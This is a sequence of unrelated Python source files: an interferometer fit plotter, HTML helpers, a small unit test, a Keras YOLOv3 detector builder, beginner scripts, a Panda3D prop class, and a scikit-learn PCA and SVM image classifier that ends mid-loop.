title="Residual Map vs UV-Distance (imag)",
filename="imag_residual_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if normalized_residual_map_real:
self.mat_plot_1d.plot_yx(
y=np.real(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Normalized Residual Map vs UV-Distance (real)",
filename="real_normalized_residual_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if normalized_residual_map_imag:
self.mat_plot_1d.plot_yx(
y=np.imag(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Normalized Residual Map vs UV-Distance (imag)",
filename="imag_normalized_residual_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if chi_squared_map_real:
self.mat_plot_1d.plot_yx(
y=np.real(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Chi-Squared Map vs UV-Distance (real)",
filename="real_chi_squared_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if chi_squared_map_imag:
self.mat_plot_1d.plot_yx(
y=np.imag(self.fit.residual_map),
x=self.fit.interferometer.uv_distances / 10 ** 3.0,
visuals_1d=self.visuals_1d,
auto_labels=AutoLabels(
title="Chi-Squared Map vs UV-Distance (imag)",
filename="imag_chi_squared_map_vs_uv_distances",
ylabel="V$_{R,data}$ - V$_{R,model}$",
xlabel=r"UV$_{distance}$ (k$\lambda$)",
),
plot_axis_type_override="scatter",
)
if dirty_image:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_image,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(title="Dirty Image", filename="dirty_image_2d"),
)
if dirty_noise_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_noise_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Noise Map", filename="dirty_noise_map_2d"
),
)
if dirty_signal_to_noise_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_signal_to_noise_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Signal-To-Noise Map",
filename="dirty_signal_to_noise_map_2d",
),
)
if dirty_model_image:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_model_image,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Model Image", filename="dirty_model_image_2d"
),
)
if dirty_residual_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_residual_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Residual Map", filename="dirty_residual_map_2d"
),
)
if dirty_normalized_residual_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_normalized_residual_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Normalized Residual Map",
filename="dirty_normalized_residual_map_2d",
),
)
if dirty_chi_squared_map:
self.mat_plot_2d.plot_array(
array=self.fit.dirty_chi_squared_map,
visuals_2d=self.get_visuals_2d_real_space(),
auto_labels=AutoLabels(
title="Dirty Chi-Squared Map", filename="dirty_chi_squared_map_2d"
),
)
def subplot(
self,
visibilities: bool = False,
noise_map: bool = False,
signal_to_noise_map: bool = False,
model_visibilities: bool = False,
residual_map_real: bool = False,
residual_map_imag: bool = False,
normalized_residual_map_real: bool = False,
normalized_residual_map_imag: bool = False,
chi_squared_map_real: bool = False,
chi_squared_map_imag: bool = False,
dirty_image: bool = False,
dirty_noise_map: bool = False,
dirty_signal_to_noise_map: bool = False,
dirty_model_image: bool = False,
dirty_residual_map: bool = False,
dirty_normalized_residual_map: bool = False,
dirty_chi_squared_map: bool = False,
auto_filename: str = "subplot_fit_interferometer",
):
"""
Plots the individual attributes of the plotter's `FitInterferometer` object in 1D and 2D on a subplot.
The API is such that every plottable attribute of the `Interferometer` object is an input parameter of type
bool of the function, which if switched to `True` means that it is included on the subplot.
Parameters
----------
visibilities
Whether or not to make a 2D plot (via `scatter`) of the visibility data.
noise_map
Whether or not to make a 2D plot (via `scatter`) of the noise-map.
signal_to_noise_map
Whether or not to make a 2D plot (via `scatter`) of the signal-to-noise-map.
model_visibilities
Whether or not to make a 2D plot (via `scatter`) of the model visibility data.
residual_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the residual map.
residual_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the residual map.
normalized_residual_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the normalized residual map.
normalized_residual_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the normalized residual map.
chi_squared_map_real
Whether or not to make a 1D plot (via `plot`) of the real component of the chi-squared map.
chi_squared_map_imag
Whether or not to make a 1D plot (via `plot`) of the imaginary component of the chi-squared map.
dirty_image
Whether or not to make a 2D plot (via `imshow`) of the dirty image.
dirty_noise_map
Whether or not to make a 2D plot (via `imshow`) of the dirty noise map.
dirty_model_image
Whether or not to make a 2D plot (via `imshow`) of the dirty model image.
dirty_residual_map
Whether or not to make a 2D plot (via `imshow`) of the dirty residual map.
dirty_normalized_residual_map
Whether or not to make a 2D plot (via `imshow`) of the dirty normalized residual map.
dirty_chi_squared_map
Whether or not to make a 2D plot (via `imshow`) of the dirty chi-squared map.
auto_filename
The default filename of the output subplot if written to hard-disk.
"""
self._subplot_custom_plot(
visibilities=visibilities,
noise_map=noise_map,
signal_to_noise_map=signal_to_noise_map,
model_visibilities=model_visibilities,
residual_map_real=residual_map_real,
residual_map_imag=residual_map_imag,
normalized_residual_map_real=normalized_residual_map_real,
normalized_residual_map_imag=normalized_residual_map_imag,
chi_squared_map_real=chi_squared_map_real,
chi_squared_map_imag=chi_squared_map_imag,
dirty_image=dirty_image,
dirty_noise_map=dirty_noise_map,
dirty_signal_to_noise_map=dirty_signal_to_noise_map,
dirty_model_image=dirty_model_image,
dirty_residual_map=dirty_residual_map,
dirty_normalized_residual_map=dirty_normalized_residual_map,
dirty_chi_squared_map=dirty_chi_squared_map,
auto_labels=AutoLabels(filename=auto_filename),
)
def subplot_fit_interferometer(self):
    """
    Standard subplot of the attributes of the plotter's `FitInterferometer` object.
    """
    # Switch on the real/imaginary residual, normalized-residual and
    # chi-squared panels; every other panel keeps its default.
    panels = dict(
        residual_map_real=True,
        residual_map_imag=True,
        normalized_residual_map_real=True,
        normalized_residual_map_imag=True,
        chi_squared_map_real=True,
        chi_squared_map_imag=True,
    )
    return self.subplot(auto_filename="subplot_fit_interferometer", **panels)
def subplot_fit_dirty_images(self):
    """
    Standard subplot of the dirty attributes of the plotter's `FitInterferometer` object.
    """
    # Switch on the dirty-image panels; every other panel keeps its default.
    panels = dict(
        dirty_image=True,
        dirty_signal_to_noise_map=True,
        dirty_model_image=True,
        dirty_residual_map=True,
        dirty_normalized_residual_map=True,
        dirty_chi_squared_map=True,
    )
    return self.subplot(auto_filename="subplot_fit_dirty_images", **panels)
class FitInterferometerPlotter(Plotter):
    def __init__(
        self,
        fit: FitInterferometer,
        mat_plot_1d: MatPlot1D = MatPlot1D(),
        visuals_1d: Visuals1D = Visuals1D(),
        include_1d: Include1D = Include1D(),
        mat_plot_2d: MatPlot2D = MatPlot2D(),
        visuals_2d: Visuals2D = Visuals2D(),
        include_2d: Include2D = Include2D(),
    ):
        """
        Plots the attributes of `FitInterferometer` objects using the matplotlib method `imshow()` and many other
        matplotlib functions which customize the plot's appearance.

        The `mat_plot_2d` attribute wraps matplotlib function calls to make the figure. By default, the settings
        passed to every matplotlib function called are those specified in the `config/visualize/mat_wrap/*.ini` files,
        but a user can manually input values into `MatPlot2d` to customize the figure's appearance.

        Overlaid on the figure are visuals, contained in the `Visuals2D` object. Attributes may be extracted from
        the `FitInterferometer` and plotted via the visuals object, if the corresponding entry is `True` in the `Include2D`
        object or the `config/visualize/include.ini` file.

        Parameters
        ----------
        fit
            The fit to an interferometer dataset the plotter plots.
        mat_plot_1d
            Contains objects which wrap the matplotlib function calls that make 1D plots.
        visuals_1d
            Contains visuals that can be overlaid on 1D plots.
        include_1d
            Specifies which attributes of the fit are extracted and plotted as visuals on 1D plots.
        mat_plot_2d
            Contains objects which wrap the matplotlib function calls that make the plot.
        visuals_2d
            Contains visuals that can be overlaid on the plot.
        include_2d
            Specifies which attributes of the `Array2D` are extracted and plotted as visuals.
        """
        super().__init__(
            mat_plot_1d=mat_plot_1d,
            include_1d=include_1d,
            visuals_1d=visuals_1d,
            mat_plot_2d=mat_plot_2d,
            include_2d=include_2d,
            visuals_2d=visuals_2d,
        )

        self.fit = fit

        # All figure/subplot behaviour is implemented once in the meta-plotter
        # and re-exposed here, so this class only wires up the fit object.
        self._fit_interferometer_meta_plotter = FitInterferometerPlotterMeta(
            fit=self.fit,
            get_visuals_2d_real_space=self.get_visuals_2d_real_space,
            mat_plot_1d=self.mat_plot_1d,
            include_1d=self.include_1d,
            visuals_1d=self.visuals_1d,
            mat_plot_2d=self.mat_plot_2d,
            include_2d=self.include_2d,
            visuals_2d=self.visuals_2d,
        )

        # Delegate the public plotting API to the meta-plotter's bound methods.
        self.figures_2d = self._fit_interferometer_meta_plotter.figures_2d
        self.subplot = self._fit_interferometer_meta_plotter.subplot
        self.subplot_fit_interferometer = (
            self._fit_interferometer_meta_plotter.subplot_fit_interferometer
        )
        self.subplot_fit_dirty_images = (
            self._fit_interferometer_meta_plotter.subplot_fit_dirty_images
        )

    def get_visuals_2d_real_space(self) -> Visuals2D:
        # Visuals for real-space figures are derived from the dataset's
        # real-space mask.
        return self.get_2d.via_mask_from(mask=self.fit.interferometer.real_space_mask)
|
# Helpers for formatting answer labels and HTML-escaping solution text.
import html
import re
_CAMEL_CASE_RE = re.compile(r'([a-z])([A-Z])')


def format_label(label: str) -> str:
    """Turn a camelCase and/or snake_case label into lower-case, space-separated words."""
    spaced = _CAMEL_CASE_RE.sub(r'\1 \2', label)
    return spaced.lower().replace('_', ' ')
def preformat_html(solution: str) -> str:
    """Wrap `solution` in a <pre> block, HTML-escaping it and turning newlines into <br />."""
    body = html.escape(solution).replace('\n', '<br />')
    return '<pre>%s</pre>' % body
|
import sys
import os
from nose.tools import assert_equal
# Make the package root (one directory above this test file) importable
# when the tests are run directly from this directory.
ROOT_DIR = os.path.abspath(os.path.dirname(__file__))
sys.path.append(os.path.join(ROOT_DIR, '..'))
from component.intent.request import Request
from component.intent.response import Response
class TestIntentResponse(object):
    """Tests for constructing a Response from a Request."""

    def test_create_response_from_request(self):
        """A Response must mirror the intent name, language and data of its Request."""
        request = Request()
        request.intent_name = 'abc'
        request.lang = 'jp_JP'
        request.data = {
            'a': 'a', 'b': 'b'
        }
        response = Response(request)
        # Plain asserts give pytest's assertion introspection and drop the
        # dependency on the unmaintained nose package's assert_equal.
        assert response.intent_name == request.intent_name
        assert response.lang == request.lang
        assert response.data == request.data
|
from keras.models import Model
from keras.layers import Conv2D, Input, BatchNormalization, LeakyReLU, ZeroPadding2D, UpSampling2D, Dense, Flatten, Activation, Reshape, Lambda
from keras.layers.merge import add, concatenate
import tensorflow as tf
from keras import backend as K
# YOLOv3 anchor-box sizes as flat (width, height) pairs in input pixels, one
# list per output scale: index 0 = large-object head, 1 = medium, 2 = small
# (see the anchors(0)/anchors(1)/anchors(2) calls in get_yolo_model).
ANC_VALS = [[116,90, 156,198, 373,326], [30,61, 62,45, 59,119], [10,13, 16,30, 33,23]]
def _conv_block(inp, convs, skip=True, train=False):
    """Apply a sequence of darknet-style Conv2D(+BatchNorm+LeakyReLU) layers to `inp`.

    Each entry of `convs` is a dict with keys 'filter', 'kernel', 'stride',
    'bnorm', 'leaky', 'layer_idx' and optionally 'train' (a per-layer override
    of the `train` trainable flag). When `skip` is True, the tensor just before
    the last two convolutions is added to the final output (residual connection).

    NOTE(review): if skip is True and len(convs) < 2, `skip_connection` is never
    assigned and the final `add` raises NameError -- callers always pass >= 2
    convs when skip is True.
    """
    x = inp
    count = 0

    for conv in convs:
        # Capture the activation entering the last two convs for the residual add.
        if count == (len(convs) - 2) and skip:
            skip_connection = x
        count += 1

        if conv['stride'] > 1: x = ZeroPadding2D(((1,0),(1,0)))(x) # peculiar padding as darknet prefer left and top
        if 'train' in conv:
            trainflag = conv['train']  # per-layer override of the trainable flag
        else:
            trainflag = train
        x = Conv2D(conv['filter'],
                   conv['kernel'],
                   strides=conv['stride'],
                   padding='valid' if conv['stride'] > 1 else 'same', # peculiar padding as darknet prefer left and top
                   name='conv_' + str(conv['layer_idx']),
                   use_bias=False if conv['bnorm'] else True, trainable=trainflag)(x)
        if conv['bnorm']: x = BatchNormalization(epsilon=0.001, name='bnorm_' + str(conv['layer_idx']),trainable=trainflag)(x)
        if conv['leaky']: x = LeakyReLU(alpha=0.1, name='leaky_' + str(conv['layer_idx']),trainable=trainflag)(x)

    return add([skip_connection, x]) if skip else x
def crop(start, end):
    """Return a Lambda layer slicing the last axis of a rank-5 tensor
    from `start` (inclusive) to `end` (exclusive)."""
    return Lambda(lambda x: x[:, :, :, :, start:end])
def anchors(i):
    """Return a Lambda layer that maps raw wh predictions through exp() and
    scales them by the anchor sizes of output scale `i` (see ANC_VALS)."""
    def _apply(x):
        anchor_tensor = tf.constant(ANC_VALS[i], dtype='float', shape=[1, 1, 1, 3, 2])
        return tf.exp(x) * anchor_tensor
    return Lambda(_apply)
def positions(h, w):
    """Return a Lambda layer converting per-cell xy offsets into absolute
    network-input coordinates.

    The incoming tensor holds sigmoid xy offsets per grid cell; a grid of cell
    indices is added and the sum is rescaled from grid units to input pixels
    (w, h).
    """
    def func(x):
        # compute grid factor and net factor
        grid_h = tf.shape(x)[1]
        grid_w = tf.shape(x)[2]
        grid_factor = tf.reshape(tf.cast([grid_w, grid_h], tf.float32), [1,1,1,1,2])
        net_factor = tf.reshape(tf.cast([w, h], tf.float32), [1,1,1,1,2])

        # Build a square grid of cell x-indices sized by the larger grid
        # dimension, then transpose for the y-indices.
        # tf.to_float was removed after TF 1.x; tf.cast(..., tf.float32) is
        # the equivalent and matches the casts above.
        max_grid = tf.maximum(grid_h, grid_w)
        cell_x = tf.cast(
            tf.reshape(tf.tile(tf.range(max_grid), [max_grid]),
                       (1, max_grid, max_grid, 1, 1)),
            tf.float32)
        cell_y = tf.transpose(cell_x, (0,2,1,3,4))
        cell_grid = tf.tile(tf.concat([cell_x, cell_y], -1), [1, 1, 1, 3, 1])

        pred_box_xy = (cell_grid[:, :grid_h, :grid_w, :, :] + x)
        pred_box_xy = pred_box_xy * net_factor / grid_factor
        return pred_box_xy
    return Lambda(func)
def get_yolo_model(in_w=416,in_h=416, num_class=80, trainable=False, headtrainable=False):
    """Build a YOLOv3 Keras model whose three outputs are already decoded.

    Parameters
    ----------
    in_w, in_h : int
        Network input width/height; the output grids are in_*/32, /16 and /8.
    num_class : int
        Number of object classes (80 corresponds to the pretrained COCO head).
    trainable : bool
        Trainable flag applied to the backbone layers.
    headtrainable : bool
        Trainable flag for the three final detection-head convolutions.

    Returns
    -------
    keras Model mapping an (in_h, in_w, 3) image to [large, medium, small]
    tensors of shape (grid_h, grid_w, 3, num_class + 5): absolute xy, anchor-
    scaled wh, then sigmoid scores.
    """
    # for each box we have num_class outputs, 4 bbox coordinates, and 1 object confidence value
    out_size = num_class+5
    input_image = Input(shape=( in_h,in_w, 3))

    # Layer  0 => 4
    x = _conv_block(input_image, [{'filter': 32, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 0},
                                  {'filter': 64, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 1},
                                  {'filter': 32, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 2},
                                  {'filter': 64, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 3}], train=trainable)

    # Layer  5 => 8
    x = _conv_block(x, [{'filter': 128, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 5},
                        {'filter':  64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 6},
                        {'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 7}], train=trainable)

    # Layer  9 => 11
    x = _conv_block(x, [{'filter':  64, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 9},
                        {'filter': 128, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 10}], train=trainable)

    # Layer 12 => 15
    x = _conv_block(x, [{'filter': 256, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 12},
                        {'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 13},
                        {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 14}], train=trainable)

    # Layer 16 => 36 (seven residual pairs)
    for i in range(7):
        x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 16+i*3},
                            {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 17+i*3}], train=trainable)
    # Stride-8 feature map, reused by the small-object head via concatenate.
    skip_36 = x

    # Layer 37 => 40
    x = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 37},
                        {'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 38},
                        {'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 39}], train=trainable)

    # Layer 41 => 61 (seven residual pairs)
    for i in range(7):
        x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 41+i*3},
                            {'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 42+i*3}], train=trainable)
    # Stride-16 feature map, reused by the medium-object head via concatenate.
    skip_61 = x

    # Layer 62 => 65
    x = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 2, 'bnorm': True, 'leaky': True, 'layer_idx': 62},
                        {'filter':  512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 63},
                        {'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 64}], train=trainable)

    # Layer 66 => 74 (three residual pairs)
    for i in range(3):
        x = _conv_block(x, [{'filter':  512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 66+i*3},
                            {'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 67+i*3}], train=trainable)

    # Layer 75 => 79
    x = _conv_block(x, [{'filter':  512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 75},
                        {'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 76},
                        {'filter':  512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 77},
                        {'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 78},
                        {'filter':  512, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 79}], skip=False, train=trainable)

    # Layer 80 => 82 -- large-object head.
    # NOTE(review): when num_class != 80 the head conv is named with layer_idx
    # 981 instead of 81, presumably so pretrained COCO head weights are NOT
    # matched by name when loading weights -- confirm with the loading code.
    if num_class!=80:
        yolo_82 = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 80},
                                  {'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False,'train': headtrainable, 'layer_idx': 981}], skip=False, train=trainable)
    else:
        yolo_82 = _conv_block(x, [{'filter': 1024, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 80},
                                  {'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False,'train': headtrainable, 'layer_idx': 81}], skip=False, train=trainable)

    # Layer 83 => 86 -- upsample and merge with the stride-16 skip.
    x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 84}], skip=False, train=trainable)
    x = UpSampling2D(2)(x)
    x = concatenate([x, skip_61])

    # Layer 87 => 91
    x = _conv_block(x, [{'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 87},
                        {'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 88},
                        {'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 89},
                        {'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 90},
                        {'filter': 256, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 91}], skip=False, train=trainable)

    # Layer 92 => 94 -- medium-object head (same head-renaming trick: 993 vs 93).
    if num_class!=80:
        yolo_94 = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 92},
                                  {'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'train': headtrainable, 'layer_idx': 993}], skip=False, train=trainable)
    else:
        yolo_94 = _conv_block(x, [{'filter': 512, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 92},
                                  {'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'train': headtrainable, 'layer_idx': 93}], skip=False, train=trainable)

    # Layer 95 => 98 -- upsample and merge with the stride-8 skip.
    x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 96}], skip=False, train=trainable)
    x = UpSampling2D(2)(x)
    x = concatenate([x, skip_36])

    # Layer 99 => 106
    x = _conv_block(x, [{'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 99},
                        {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 100},
                        {'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 101},
                        {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 102},
                        {'filter': 128, 'kernel': 1, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 103},
                        {'filter': 256, 'kernel': 3, 'stride': 1, 'bnorm': True, 'leaky': True, 'layer_idx': 104},], skip=False, train=trainable)

    # Small-object head (same head-renaming trick: 9105 vs 105).
    if num_class!=80:
        yolo_106 = _conv_block(x, [{'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'train': headtrainable,'layer_idx': 9105}], skip=False, train=trainable)
    else:
        yolo_106 = _conv_block(x, [{'filter': 3*out_size, 'kernel': 1, 'stride': 1, 'bnorm': False, 'leaky': False, 'train': headtrainable,'layer_idx': 105}], skip=False, train=trainable)

    # Reshape each head to (grid_h, grid_w, 3 anchors, out_size).
    final_large = Reshape((in_h//32,in_w//32,3,out_size))(yolo_82)
    final_med   = Reshape((in_h//16, in_w//16,3,out_size))(yolo_94)
    final_small = Reshape((in_h//8,in_w//8,3,out_size))(yolo_106)

    #output = [final_large, final_med, final_small]
    #model = Model(input_image,output)
    #return model

    # Decode each scale: channels 0-1 = xy offsets, 2-3 = wh, 4+ = scores.
    s_offs =crop(0,2)(final_small)
    s_szs =crop(2,4)(final_small)
    s_scores =crop(4,out_size)(final_small)
    s_scores = Activation('sigmoid')(s_scores)
    s_szs = anchors(2)(s_szs)
    s_offs = Activation('sigmoid')(s_offs)
    s_offs = positions(in_h,in_w)(s_offs)
    s_out = concatenate([s_offs, s_szs, s_scores])

    m_offs =crop(0,2)(final_med)
    m_szs =crop(2,4)(final_med)
    m_scores =crop(4,out_size)(final_med)
    m_scores = Activation('sigmoid')(m_scores)
    m_szs = anchors(1)(m_szs)
    m_offs = Activation('sigmoid')(m_offs)
    m_offs = positions(in_h,in_w)(m_offs)
    m_out = concatenate([m_offs, m_szs, m_scores])

    l_offs =crop(0,2)(final_large)
    l_szs =crop(2,4)(final_large)
    l_scores =crop(4,out_size)(final_large)
    l_scores = Activation('sigmoid')(l_scores)
    l_szs = anchors(0)(l_szs)
    l_offs = Activation('sigmoid')(l_offs)
    l_offs = positions(in_h,in_w)(l_offs)
    l_out = concatenate([l_offs, l_szs, l_scores])

    output = [l_out, m_out, s_out]
    model = Model(input_image,output)
    return model
|
# Standalone script: prints the literal string "matrícula".
print("matrícula")
#!/usr/bin/env python
# `from <this package> import *` exports only the name `nemo`.
__all__ = ["nemo"]
|
# Author: Thomas Porturas <thomas.porturas.eras@gmail.com>
from . import model_utilities as mu
from .data_preprocessing import process_files
from .figure_pipeline import run_pipeline
from .data_nl_processing import NlpForLdaInput
from .compare_models import CompareModels, run_model_comparison
from .optimize_mallet import CompareMalletModels
from .mallet_model import MalletModel, generate_mallet_models
|
# Read a city name, normalise whitespace/case, and report whether it starts
# with the word "SANTO" (checking the first five characters is equivalent).
cidade = input('Digite o produto de uma cidade: ').strip().upper()
comeca_com_santo = cidade.startswith('SANTO')
print('A cidade começa com a palavra Santo? {}'.format(comeca_com_santo))
|
from direct.showbase.DirectObject import DirectObject
from panda3d.core import *
class Castle(DirectObject):
    """A static castle prop placed into the Panda3D scene graph.

    Parameters: `pos` and `hpr` are objects exposing getX/getY/getZ (e.g.
    Panda3D Point3/Vec3), `sc` is a uniform scale factor.
    """

    def __init__(self, pos, hpr, sc):
        # `loader` and `render` are Panda3D ShowBase builtins -- a ShowBase
        # instance must exist before constructing a Castle.
        self.model = loader.loadModel("models/castle")
        self.model.setPos(pos.getX(), pos.getY(), pos.getZ())
        self.model.setHpr(hpr.getX(), hpr.getY(), hpr.getZ())
        self.model.setScale(sc)
        self.model.reparentTo(render)
|
# optional -> get data based on the specified location |
#
#
# Server side image processing
# Adding PCA dimensionality reduction
#
from __future__ import print_function
from time import time
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import classification_report
from sklearn.svm import SVC
from sklearn.externals import joblib
from sklearn.decomposition import RandomizedPCA
import numpy as np
if __name__ == "__main__":
    # Dataset location and file structure
    dataDir = '/Users/andy/Documents/Software/imageProcessing/'
    dataFile = 'X.csv'
    labelFile = 'y.csv'
    testDataFile = 'Xtest.csv'
    testLabelFile = 'ytest.csv'
    testNameFile = 'NamesTest.csv'
    modelName = 'svmImageClassifier.pkl'

    ############################################################################
    # Load training data
    ############################################################################
    X = np.genfromtxt(dataDir+dataFile, delimiter=',')
    X = X[:,0:3200] # TODO Fix nan column
    y = np.genfromtxt(dataDir+labelFile, delimiter=',')
    n_samples,n_features = X.shape

    ############################################################################
    # PCA for dimensionality reduction
    ############################################################################
    n_components = 25
    pca = RandomizedPCA(n_components=n_components, whiten=True).fit(X)
    joblib.dump(pca, dataDir+'transform.pkl')
    eigenpeople = pca.components_.reshape((n_components, 80, 40)) # TODO: automatically get h and w
    X_train_pca = pca.transform(X)

    ############################################################################
    # Train a SVM classification model
    ############################################################################
    print("Fitting the classifier to the training set")
    t0 = time()
    param_grid = {'C': [1e2, 5e2, 1e3, 5e3, 1e4],
                  'gamma': [0.00001, 0.00005, 0.0001, 0.0005, 0.001, 0.005], }
    # NOTE(review): class_weight='auto' was renamed to 'balanced' in later
    # scikit-learn releases; kept as-is for the pinned old version.
    clf = GridSearchCV(SVC(kernel='linear', class_weight='auto'), param_grid) # 13 errors in 107 test set
    clf = clf.fit(X_train_pca, y)
    print("done in %0.3fs" % (time() - t0))
    print("Best estimator found by grid search:")
    print(clf.best_estimator_)

    # Save the best model to disk for server-side reuse.
    clf = clf.best_estimator_
    joblib.dump(clf, dataDir+'imageSvmClassifier.pkl')
    y_pred = clf.predict(X_train_pca)
    # NOTE(review): target_names=list(str(y)) passes the characters of the
    # array's string repr, not class names -- looks wrong; kept to preserve
    # the current report output, but verify intent.
    print(classification_report(y, y_pred, target_names=list(str(y))))

    ############################################################################
    # Quantitative evaluation of the model quality on the test set
    ############################################################################
    Xtest = np.genfromtxt(dataDir+testDataFile, delimiter=',')
    Xtest = Xtest[:, 0:3200]
    ytest = np.genfromtxt(dataDir+testLabelFile, delimiter=',')
    nameListTest = []
    with open(dataDir+testNameFile) as fName:
        for line in fName:
            nameListTest.append(line)
    print("Predicting presence of people in the test set")
    t0 = time()
    X_test_pca = pca.transform(Xtest)
    y_pred = clf.predict(X_test_pca)
    print("done in %0.3fs" % (time() - t0))
    print(y_pred)
    nn = ytest.shape[0]
    errorCount = 0
    for i in range(ytest.shape[0]):
        flag = ''
        # BUGFIX: '<>' is Python 2-only syntax and a SyntaxError on Python 3;
        # '!=' behaves identically on both.
        if (ytest[i] != y_pred[i]):
            errorCount += 1
